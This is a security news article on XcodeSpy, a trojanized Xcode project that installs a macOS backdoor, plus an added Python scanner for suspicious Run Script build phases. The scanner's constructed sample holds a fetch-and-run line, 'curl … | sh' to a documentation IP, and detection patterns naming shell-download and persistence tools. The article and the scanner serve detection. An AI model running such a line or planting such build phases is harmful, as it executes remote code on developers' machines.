Trojanized Xcode Project Slips MacOS Malware to Apple Developers
Cybercriminals are targeting Apple developers with a trojanized Xcode project which, once launched, installs a backdoor with spying and data-exfiltration capabilities.
Xcode is Apple's free suite of development tools for building software for macOS, iOS, iPadOS, watchOS and tvOS. Because the malicious code is embedded in the shared project itself rather than in a separate download, it runs on the machine of any developer who opens and builds the project, and any app built on top of the project includes the malicious code.
"The XcodeSpy infection vector could be used by other threat actors, and all Apple Developers using Xcode are advised to exercise caution when adopting shared Xcode projects," said Phil Stokes, researcher with SentinelLabs on Thursday.
The trojanized Xcode project is a doctored version of a legitimate, open-source project that's available on GitHub called TabBarInteraction; this project offers iOS developers several advanced features for animating the iOS Tab Bar based on user interaction.
Attackers have used Xcode as an initial attack vector against Apple-platform developers before.
"While XcodeSpy appears to be directly targeted at the developers themselves rather than developers' products or clients, it's a short step from backdooring a developer's working environment to delivering malware to users of that developer's software," said researchers.
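The advice above, to treat shared Xcode projects with caution, is easier to act on with a concrete pre-build check. SentinelLabs' report (not quoted on this page) describes the XcodeSpy payload as an obfuscated shell script placed in a Run Script build phase, which Xcode executes on the developer's machine as soon as the target is built. The script below is an added example, written for this page; it is not code from Threatpost, SentinelLabs, the TabBarInteraction project or XcodeSpy. It parses the `PBXShellScriptBuildPhase` objects out of a `project.pbxproj` file and flags scripts containing indicators that build housekeeping normally has no use for. The `SAMPLE_PBXPROJ` fragment is constructed for the example (the URL in it is a documentation address, not a real C2), and the indicator list is this example's own assumption, not a published XcodeSpy signature.

```python
import re
from pathlib import Path
from typing import Dict, List

# Constructed sample fragment of an Xcode project.pbxproj (NeXTSTEP-style plist).
# It is NOT the TabBarInteraction project or the XcodeSpy payload; it contains one
# benign Run Script phase and one that behaves like a dropper (eval of base64 text,
# then a remote script piped into sh). 192.0.2.10 is a reserved documentation address.
SAMPLE_PBXPROJ = r'''// !$*UTF8*$!
{
    objects = {
        AA0001 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            name = "Run Script";
            shellPath = /bin/sh;
            shellScript = "# Type a script or drag a script file from your workspace\necho \"Build $(date)\"\n";
        };
        AA0002 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            name = "Run Script";
            shellPath = /bin/sh;
            shellScript = "eval \"$(echo ZWNobyBoaQ== | base64 -d)\"\ncurl -s http://192.0.2.10/update.sh | sh\n";
        };
        AA0003 /* Sources */ = {
            isa = PBXSourcesBuildPhase;
            files = ();
        };
    };
}
'''

# Indicators that a Run Script phase does more than build housekeeping.
# This list is an assumption made for the example, not a published XcodeSpy signature.
SUSPICIOUS_PATTERNS = {
    "base64 decode": re.compile(r"base64\s+(-d|--decode|-D)\b"),
    "eval of generated text": re.compile(r"\beval\b"),
    "remote fetch": re.compile(r"\b(curl|wget)\b"),
    "fetch piped to shell": re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sh|bash|zsh|python\d?)\b"),
    "AppleScript execution": re.compile(r"\bosascript\b"),
    "inline python": re.compile(r"\bpython\d?\s+-c\b"),
    "persistence via launchd": re.compile(r"LaunchAgents|LaunchDaemons|\blaunchctl\b"),
    "writes to temp dir": re.compile(r"/tmp/|\$TMPDIR"),
}

_ESCAPES = {"n": "\n", "t": "\t"}


def _unescape(s: str) -> str:
    """Undo the C-style escapes pbxproj uses inside quoted strings, in one pass."""
    return re.sub(r"\\(.)", lambda m: _ESCAPES.get(m.group(1), m.group(1)), s, flags=re.S)


def _enclosing_block(text: str, pos: int) -> str:
    """Return the `{ ... }` object containing position pos, ignoring braces inside quoted strings."""
    start = text.rfind("{", 0, pos)
    depth, in_str, i = 0, False, start
    while i < len(text):
        c = text[i]
        if in_str:
            if c == "\\":
                i += 1                      # skip the escaped character
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
        elif c == "{":
            depth += 1
        elif c == "}":
            depth -= 1
            if depth == 0:
                break
        i += 1
    return text[start:i + 1]


def extract_run_scripts(pbxproj: str) -> List[Dict[str, str]]:
    """Return every PBXShellScriptBuildPhase object as {id, name, shell_path, script}."""
    phases = []
    for m in re.finditer(r"isa\s*=\s*PBXShellScriptBuildPhase\s*;", pbxproj):
        block = _enclosing_block(pbxproj, m.start())
        # The object id and its comment sit right before the brace: `AA0002 /* Run Script */ = {`
        head = pbxproj[: pbxproj.rfind("{", 0, m.start())].rstrip()
        id_m = re.search(r"(\w+)\s*(?:/\*[^*]*\*/)?\s*=\s*\Z", head)
        name_m = re.search(r'\bname\s*=\s*(?:"((?:[^"\\]|\\.)*)"|([^";\s]+))\s*;', block)
        path_m = re.search(r'\bshellPath\s*=\s*(?:"((?:[^"\\]|\\.)*)"|([^";\s]+))\s*;', block)
        script_m = re.search(r'\bshellScript\s*=\s*"((?:[^"\\]|\\.)*)"\s*;', block)
        phases.append({
            "id": id_m.group(1) if id_m else "?",
            "name": _unescape(name_m.group(1) or name_m.group(2)) if name_m else "",
            "shell_path": (path_m.group(1) or path_m.group(2)) if path_m else "/bin/sh",
            "script": _unescape(script_m.group(1)) if script_m else "",
        })
    return phases


def audit_run_scripts(pbxproj: str) -> List[Dict[str, object]]:
    """Attach the list of matching indicator labels to every Run Script phase."""
    report = []
    for phase in extract_run_scripts(pbxproj):
        hits = [label for label, rx in SUSPICIOUS_PATTERNS.items() if rx.search(phase["script"])]
        report.append({**phase, "indicators": hits})
    return report


def audit_project_dir(root: str) -> Dict[str, List[Dict[str, object]]]:
    """Audit every project.pbxproj under root, e.g. a freshly cloned shared project."""
    return {str(p): audit_run_scripts(p.read_text(errors="replace"))
            for p in Path(root).rglob("project.pbxproj")}


if __name__ == "__main__":
    import sys
    reports = (audit_project_dir(sys.argv[1]) if len(sys.argv) > 1
               else {"<constructed sample>": audit_run_scripts(SAMPLE_PBXPROJ)})
    for path, phases in reports.items():
        for ph in phases:
            flag = "SUSPICIOUS" if ph["indicators"] else "ok"
            print(f"{flag:10} {path} {ph['id']} {ph['name']!r} ({ph['shell_path']}) {', '.join(ph['indicators'])}")
            if ph["indicators"]:
                print("    " + ph["script"].replace("\n", "\n    ").rstrip())
```

Run it against the clone directory before opening the project in Xcode (`python3 audit_pbxproj.py path/to/clone`; the file name is this example's choice); without an argument it audits the constructed sample and flags only the second phase. The indicator list is deliberately noisy: plenty of legitimate projects call `curl` or write to `/tmp`, so a hit means "read this script before you build", not "this project is XcodeSpy". Xcode also keeps per-user scheme and breakpoint settings under `xcuserdata`, which can run shell commands too, so a thorough review of a shared project covers those files as well.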
News URL
https://threatpost.com/xcode-macos-malware-apple-developers/164897/
Related news
- N. Korean Hackers Use Fake Interviews to Infect Developers with Cross-Platform Malware
- macOS HM Surf vuln might already be under exploit by major malware family
- BeaverTail Malware Resurfaces in Malicious npm Packages Targeting Developers
- North Korean Hackers Target Crypto Firms with Hidden Risk Malware on macOS
- North Korean hackers use new macOS malware against crypto firms
- North Korean Hackers Target macOS Using Flutter-Embedded Malware
- New RustyAttr Malware Targets macOS Through Extended Attribute Abuse
- Apple fixes 2 zero-days exploited to breach macOS systems (CVE-2024-44309, CVE-2024-44308)